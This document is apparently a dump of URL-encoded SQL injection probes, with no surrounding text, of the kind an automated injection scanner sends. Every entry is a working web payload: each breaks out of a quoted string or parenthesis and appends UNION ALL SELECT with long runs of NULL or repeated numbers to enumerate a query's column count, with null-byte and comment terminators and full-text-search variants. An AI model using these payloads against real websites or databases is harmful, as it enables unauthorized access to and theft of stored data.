1%27%20%2B%20%28SELECT%20%27VhqD%27%20FROM%20DUAL%20WHERE%204799%3D4799%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27QsxT%27%20FROM%20DUAL%20WHERE%201315%3D1315%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Mgxx%27%20FROM%20DUAL%20WHERE%204806%3D4806%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27rbQD%27%20FROM%20DUAL%20WHERE%202591%3D2591%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Gqzx%27%20FROM%20DUAL%20WHERE%205939%3D5939%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27IAjh%27%20WHERE%205868%3D5868%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27WevH%27%20WHERE%202454%3D2454%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27NvfR%27%20WHERE%202483%3D2483%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27nrOb%27%20WHERE%201117%3D1117%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27yLnT%27%20WHERE%207758%3D7758%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27sxjx%27%20WHERE%204098%3D4098%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27RegQ%27%20WHERE%209336%3D9336%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27pUNI%27%20WHERE%202098%3D2098%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27uuTF%27%20WHERE%204052%3D4052%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Fcgu%27%20WHERE%209047%3D9047%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 -4299%29%20UNION%20ALL%20SELECT%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%2C%203034%00 -5739%29%20UNION%20ALL%20SELECT%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%2C%203573%00 -8304%29%20UNION%20ALL%20SELECT%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%2C%201853%00 -9740%29%20UNION%20ALL%20SELECT%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%2C%204855%00 -6095%29%20UNION%20ALL%20SELECT%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%00 -2798%29%20UNION%20ALL%20SELECT%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%00 -8437%29%20UNION%20ALL%20SELECT%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%2C%201475%00 -1464%29%20UNION%20ALL%20SELECT%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%2C%202116%00 -9458%29%20UNION%20ALL%20SELECT%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%00 -3764%29%20UNION%20ALL%20SELECT%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%2C%201538%00 -8332%27%29%20UNION%20ALL%20SELECT%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%00 -9555%27%29%20UNION%20ALL%20SELECT%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%00 -1071%27%29%20UNION%20ALL%20SELECT%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%00 -4793%27%29%20UNION%20ALL%20SELECT%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%2C%204760%00 